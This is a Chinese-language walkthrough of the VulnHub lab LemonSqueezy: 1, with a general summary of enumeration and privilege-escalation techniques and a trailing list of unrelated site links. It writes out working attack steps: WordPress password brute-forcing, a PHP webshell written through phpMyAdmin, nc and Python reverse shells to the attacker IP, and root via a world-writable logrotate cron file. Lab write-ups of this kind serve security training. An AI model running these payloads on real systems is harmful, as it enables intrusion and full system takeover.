当前位置: 首页 > wzjs >正文

车子网站北京南昌网站制作

车子网站,北京南昌网站制作,成都广告公司地址,响应式网站 像素LemonSqueezy: 1 来自 <LemonSqueezy: 1 ~ VulnHub> 1&#xff0c;将两台虚拟机网络连接都改为NAT模式 2&#xff0c;攻击机上做namp局域网扫描发现靶机 nmap -sn 192.168.23.0/24 那么攻击机IP为192.168.23.182&#xff0c;靶场IP192.168.23.225 3&#xff0c;对靶机进…

LemonSqueezy: 1

来自 <LemonSqueezy: 1 ~ VulnHub>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.182,靶场IP192.168.23.225

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.225

访问80端口开放的http服务

4,爆破枚举扫描网站存在的子目录

dirsearch -u http://192.168.23.225 -x 403,404

注意到/wordpress.tar.gz,访问一下下载这个压缩包

网站存在wordpress和phpmyadmin,非常经典的架构

5,使用wordpress的专属扫描工具

wpscan --url http://192.168.23.225/wordpress/ --api-token

wpscan --url http://192.168.23.225/wordpress/ -U orange -P /usr/share/wordlists/rockyou.txt --api-token 

orange/ginger尝试登录,然后又得到一个密码,应该是phpmyadmin的密码 n0t1n@w0rdl1st!

http://lemonsqueezy/wordpress/wp-admin/post.php?post=5&action=edit

6,尝试登录phpmyadmin

orange/n0t1n@w0rdl1st!

成功登录phpmyadmin,在phpmyadmin的SQL页面,输入以下命令:

SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/wordpress/backdoor.php"

从而创建了backdoor.php文件访问该文件:

http://192.168.23.225/wordpress/backdoor.php?cmd=whoami

然后再编写payload getshell:

http://192.168.23.225/wordpress/backdoor.php?cmd=nc%20-e%20/bin/bash%20192.168.23.182%204444

访问这个URL,与此同时kali linux要打开对4444端口的监听

nc -lvvp 4444

7,使用python创建一个可交互shell

python -c 'import pty;pty.spawn("/bin/bash")'

8,信息收集查看定时任务

cat /etc/crontab

查看其中一个文件

cat /etc/logrotate.d/logrotate

这个文件能够执行系统命令,并且能够被所有用户读写执行

9,将python反弹shell的命令写入到/etc/logrotate.d/logrotate

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.23.182",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' >> /etc/logrotate.d/logrotate

与此同时kali 使用netcat打开对1234端口的监听

nc -lvvp 1234

成功提权成为root,并且get到flag

一、信息收集与初步探测

  1. 主机发现与端口扫描
  • 使用 netdiscover 扫描局域网内的活跃主机,确定靶机IP(如 10.1.1.14967
  • 通过 nmap 进行全端口扫描(nmap -sS -sV -p-),发现开放端口(如80/http、3306/mysql),识别服务版本(如Apache 2.4.25)67
  1. Web路径枚举与CMS识别
  • 使用 gobuster 或 dirsearch 扫描Web目录,发现 /wordpress/phpmyadmin 等敏感路径67
  • 通过 Wappalyzer 或手动分析页面特征,识别WordPress框架,并利用 wpscan 枚举用户(如 orange)及爆破密码(如 n0t1n@w0rdl1st!67
  1. 子域名与配置文件分析
  • 修改 /etc/hosts 文件解析域名(如 lemonsqueezy),解决页面加载异常问题6
  • 发现备份文件(如 backupPassword)或默认配置文件(如 settings.php),提取数据库凭证47

二、漏洞利用与初始访问

  1. SQL注入与WebShell写入
  • 通过phpMyAdmin登录后执行SQL语句,利用 SELECT ... INTO OUTFILE 写入WebShell(如 shell1.php),实现命令执行7
  • 触发反向Shell:通过WebShell执行 nc -e /bin/bash 或使用 Metasploit 的 wp_admin_shell_upload 模块获取低权限Shell(如 www-data47
  1. WordPress插件与主题漏洞
  • 利用后台编辑主题功能插入恶意PHP代码(如反弹Shell),或通过上传恶意插件获取控制权47
  1. 文件包含与命令注入
  • 发现存在文件包含漏洞的脚本(如 /Challenge/include.php),通过路径遍历读取敏感文件(如 /etc/passwd)或执行系统命令57

三、权限提升与横向移动

  1. 定时任务与Logrotate提权
  • 分析 /etc/crontab 发现以root权限执行的定时任务(如日志轮转),修改 /etc/logrotate.d/logrotate 文件插入提权命令(如复制SUID权限的Bash)7
  • 执行 chmod 4777 /var/www/html/wordpress/bash 后,通过 bash -p 获取root权限7
  1. SUID/SGID滥用
  • 使用 find / -perm -4000 2>/dev/null 查找具有SUID权限的可执行文件(如 findvim),通过参数注入或环境变量劫持提权24
  1. 敏感文件篡改
  • 发现全局可写的 /etc/shadow,直接替换root用户密码哈希(如使用 openssl passwd 生成新密码)37

http://www.dtcms.com/wzjs/840579.html

相关文章:

  • 网站的超链接怎么做表格制作excel
  • 湖南众诚建设网站个人网站相册怎么做
  • 建设一站式服务网站wordpress站长之家
  • 专门做求职课程的网站做跨境电商要什么费用
  • 哈尔滨flash网站网页设计erp定制开发价格
  • 企业网站设置费用网络工程专业学什么课程
  • 做网站建设销售工资wordpress对外发邮件
  • 地信网站建设建德网站制作公司
  • 怎么 从头开始建设一个网站手机app制作流程图
  • 如何使用开源程序做网站瓜子二手车网站开发
  • 华大基因 建设公司网站个人怎么做ipv6的网站
  • 易语言网站开发怎么注册网站网址
  • 芜湖做网站找哪家好美化wordpress
  • 西宁市网站设计企业青州做网站电话
  • 奢做品二手 哪个网站好怎么看网站有没有做301
  • 玉溪市住房和建设局公布网站推广服务
  • 网站开发者取色工具免费咨询律师电话
  • 网站 dns 解析 手机访问设置灰色 网站
  • 营销网站售后调查想自己搭建网站得怎么做
  • 瀑布流响应式网站模板加强网站建设会
  • 廊坊制作网站模板建站公司合肥做网站推荐 晨飞网络
  • 网站建设基础书籍wordpress同分类文章
  • wordpress 淘宝客网站网站开发工资高吗
  • 学做网站有前途吗制作网站的过程细节
  • 网站建设经费的请示合肥网站建设服务
  • 留言板网站建设总结嵌入式培训机构
  • 门户网站模板 免费网站建设公司公司介绍
  • 购物网站怎么做推广电商培训类网站模板下载
  • 深圳设计周展会2023时间为什么做网站结构优化
  • 赤坎手机网站建设公司静态网页框架用什么软件做